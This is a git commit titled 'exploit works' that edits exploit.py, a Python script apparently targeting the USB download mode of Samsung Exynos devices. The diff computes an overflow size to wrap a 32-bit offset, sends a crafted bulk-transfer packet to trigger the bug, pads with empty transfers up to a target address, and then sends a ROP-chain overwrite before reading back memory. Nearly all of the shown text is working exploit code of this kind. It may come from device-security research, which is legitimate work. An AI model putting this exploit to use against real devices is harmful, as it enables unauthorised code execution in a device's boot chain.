exploit works

2024-07-15 23:26:23 +02:00 · 2024-07-15 23:26:23 +02:00 · ead9a8a197
commit ead9a8a197
parent 445c52acb4
1 changed files with 37 additions and 14 deletions
--- a/exploit.py
+++ b/exploit.py
@ -90,37 +90,60 @@ class ExynosDevice():

    def exploit(self, payload: bytes):
        current_offset = TARGET_OFFSETS[self.target][0]
-        transfered = 0
        transferred = ctypes.c_int()
        
-        max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200 
+        size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6
+        max_payload_size = 0x100000000 - size_to_overflow
+        
+        # max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
+        # max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200 
        payload = payload + ((max_payload_size - len(payload)) * b"\x00")
        assert len(payload) == max_payload_size, "Invalid payload"
        
        # First send payload to trigger the bug
-        bug_payload = p32(0) + p32(0xfdfde800) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0) # dummy packet for triggering the bug
+        bug_payload = p32(0) + p32(size_to_overflow) + payload[:MAX_PAYLOAD_SIZE] # dummy packet for triggering the bug
+        bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
        assert res == 0, "Error triggering payload"
-        current_offset += len(bug_payload)
+        assert transferred.value == len(bug_payload), "Invalid transfered size"
+        current_offset += len(bug_payload) - 8  # Remove header
        
        # Send the actual payload
-        transfered = 0
-        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
-        assert res == 0, "Error sending payload"
+        # res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
+        # assert res == 0, "Error sending payload"
+        # current_offset += len(payload)
        
-        current_offset += len(payload)
+        cnt = 0
        while True:
-            if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][2]:
+            if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][1] and current_offset < TARGET_OFFSETS[self.target][1]:
                break
            self.send_empty_transfer()
+            current_offset += CHUNK_SIZE
+            cnt += 1
+            if current_offset > 0x100000000:
+                current_offset = current_offset - 0x100000000 #reset 32 byte integer
+            print(f"{cnt} {hex(current_offset)}")
        
-        rop_chain = p64(TARGET_OFFSETS[self.target][0]) * (8 // CHUNK_SIZE)
+        remaining = (TARGET_OFFSETS[self.target][1] - current_offset)
+        assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet"
+        if remaining > BLOCK_SIZE:
+            self.send_empty_transfer()
+            # Send last transfer, TODO who aligns this ROM??
+            current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE)
+            cnt += 1
+            print(f"{cnt} {hex(current_offset)}")
+            
+        rop_chain = (b"\x00" * 0x110) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
+        # p_offset = (TARGET_OFFSETS[self.target][1] - current_offset)
+        # rop_chain = rop_chain[:p_offset] + (p64(TARGET_OFFSETS[self.target][0]))
+        # rop_chain = p64(TARGET_OFFSETS[self.target][0]) * 32
+        # Should
+        transferred = ctypes.c_int(0)
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
+        # assert transferred.value == len(rop_chain), "Error sending ROP chain"
        
-        
-        transfered = 0
-        buf = ctypes.c_buffer(b"", 0x20000)
-        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 10000)
+        buf = ctypes.c_buffer(b"", 0x200000)
+        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 1000)
        
        
        padding_size = TARGET_OFFSETS[self.target][1] - TARGET_OFFSETS[self.target][0]